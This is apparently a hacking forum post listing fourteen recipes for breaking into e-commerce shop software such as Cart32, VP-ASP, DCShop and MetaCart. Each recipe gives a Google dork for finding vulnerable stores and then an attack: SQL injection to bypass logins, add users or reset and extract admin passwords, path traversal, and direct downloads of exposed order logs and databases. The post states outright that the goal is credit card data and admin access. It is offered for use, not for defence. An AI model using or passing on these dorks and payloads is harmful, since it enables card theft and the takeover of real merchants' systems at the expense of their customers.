1.
2-
3-
4-
5-
6-
7-
8-
9-
10-
11-
12-
13-
14-
- Code:
google dork :--> allinurl:/cart32.exe/
target looks :--> http://www.xxxxxx.net/wrburns_s/cgi-...xe/NoItemFound
chage NoItemFound whit error
When we found Page error dig installation information beneath it, meant us was successful!
If shares this was gotten list file the format/the suffix.C32 significant in site.Gotten file contained the data cc
Copy some file.C32 was or all of them to notepad or the program text the other editor.
The substitute string url tsb.To like this: http://www.xxxxxx.net/wrburns_s/cgi-bin/cart32/
paste one by one, file.C32 at the end url has been modified earlier, with the format http://www.xxxxx.com/cart32/
2-
- Code:
google dork :--> inurl:"/cart.php?m="
target looks lile :--> http://xxxxxxx.com/store/cart.php?m=view
exploit: chage cart.php?m=view to /admin
target whit exploit :--> http://xxxxxx.com/store/admin
Usename : 'or"="
Password : 'or"="
3-
- Code:
google dork :--> allinurlroddetail.asp?prod=
target looks like :--> www.xxxxx.org/proddetail.asp?prod=XXXX (big leters and numbers )
exploit :--> chage the proddtail.asp?prod=SG369 whit fpdb/vsproducts.mdb
target whit exploit :--> www.xxxxxx.org/fpdb/vsproducts.mdb
4-
- Code:
google dork :--> allinurl: /cgi-local/shopper.cgi
target looks like :--> http://www.xxxxxx.com/cgi-local/shop...dd=action&key=
exploit :--> ...&template=order.log
target whit exploit :--> http://www.xxxxxxxx.com/cgi-local/sh...late=order.log
5-
- Code:
google dork :--> allinurl: Lobby.asp
target looks like :--> www.xxxxx.com/mall/lobby.asp
exploit :--> change /mall/lobby.asp to /fpdb/shop.mdb
target whit exploit :--> www.xxxxx.com/fpdb/shop.mdb
6-
- Code:
google dork :--> allinurl:/vpasp/shopsearch.asp
when u find a target put this in search box
Keyword=&category=5); insert into tbluser (fldusername) values
('')--&SubCategory=&hide=&action.x=46&action.y=6
Keyword=&category=5); update tbluser set fldpassword='' where
fldusername=''--&SubCategory=All&action.x=33&action.y=6
Keyword=&category=3); update tbluser set fldaccess='1' where
fldusername=''--&SubCategory=All&action.x=33&action.y=6
Jangan lupa untuk mengganti dan nya terserah kamu.
Untuk mengganti password admin, masukkan keyword berikut :
Keyword=&category=5); update tbluser set fldpassword='' where
fldusername='admin'--&SubCategory=All&action.x=33&action.y=6
login page: http://xxxxxxx/vpasp/shopadmin.asp
7-
- Code:
google dork :--> allinurl:/vpasp/shopdisplayproducts.asp
target looks like :--> http://xxxxxxx.com/vpasp/shopdisplay...asp?cat=xxxxxx
exploit :--> http://xxxxxxx.com/vpasp/shopdisplaypro ... ion%20sele ct%20fldauto,fldpassword%20from%20tbluser%20where% 20fldusername='admin'%20and%20fldpassword%20like%2 0'a%25'-
if this is not working try this ends
%20'a%25'--
%20'b%25'--
%20'c%25'--
after finding user and pass go to login page:
http://xxxx.com/vpasp/shopadmin.asp
8-
- Code:
google dork :--> allinurl:/shopadmin.asp
target looks like :--> www.xxxxxx.com/shopadmin.asp
exploit:
user : 'or'1
pass : 'or'1
9-
- Code:
google.com :--> allinurl:/store/index.cgi/page=
target looks like :--> http://www.xxxxxx.com/cgi-bin/store/...short_blue.htm
exploit :--> ../admin/files/order.log
target whit exploit :--> http://www.xxxxxxx.com/cgi-bin/store...iles/order.log
10-
- Code:
google.com:--> allinurl:/metacart/
target looks like :--> www.xxxxxx.com/metacart/about.asp
exploit :--> /database/metacart.mdb
target whit exploit :--> www.xxxxxx.com/metacart/database/metacart.mdb
11-
- Code:
google.com:--> allinurl:/DCShop/
target looks like :--> www.xxxxxx.com/xxxx/DCShop/xxxx
exploit :--> /DCShop/orders/orders.txt or /DCShop/Orders/orders.txt
target whit exploit :--> www.xxxx.com/xxxx/DCShop/orders/orders.txt or www.xxxx.com/xxxx/DCShop/Orders/orders.txt
12-
- Code:
google.com:--> allinurl:/shop/category.asp/catid=
target looks like :--> www.xxxxx.com/shop/category.asp/catid=xxxxxx
exploit :--> /admin/dbsetup.asp
target whit exploit :--> www.xxxxxx.com/admin/dbsetup.asp
after geting that page look for dbname and path. (this is also good file sdatapdshoppro.mdb , access.mdb)
target for dl the data base :--> www.xxxxxx.com/data/pdshoppro.mdb (dosent need to be like this)
in db look for access to find pass and user of shop admins.
13-
- Code:
google.com:--> allinurl:/commercesql/
target looks like :--> www.xxxxx.com/commercesql/xxxxx
exploit :--> cgi-bin/commercesql/index.cgi?page=
target whit exploit admin config :--> http://www.xxxxxx.com/cgi-bin/commer... ... in_conf.pl
target whit exploit admin manager :--> http://www.xxxxxx.com/cgi-bin/commer...in/manager.cgi
target whit exploit order.log :--> http://www.xxxxx.com/cgi-bin/commerc...iles/order.log
14-
- Code:
google.com:--> allinurl:/eshop/
target looks like :--> www.xxxxx.com/xxxxx/eshop
exploit :-->/cg-bin/eshop/database/order.mdb
target whit exploit :--> http://www.xxxxxx.com/.../cg-bin/e....base/order.mdb
after dl the db look at access for user and password !!
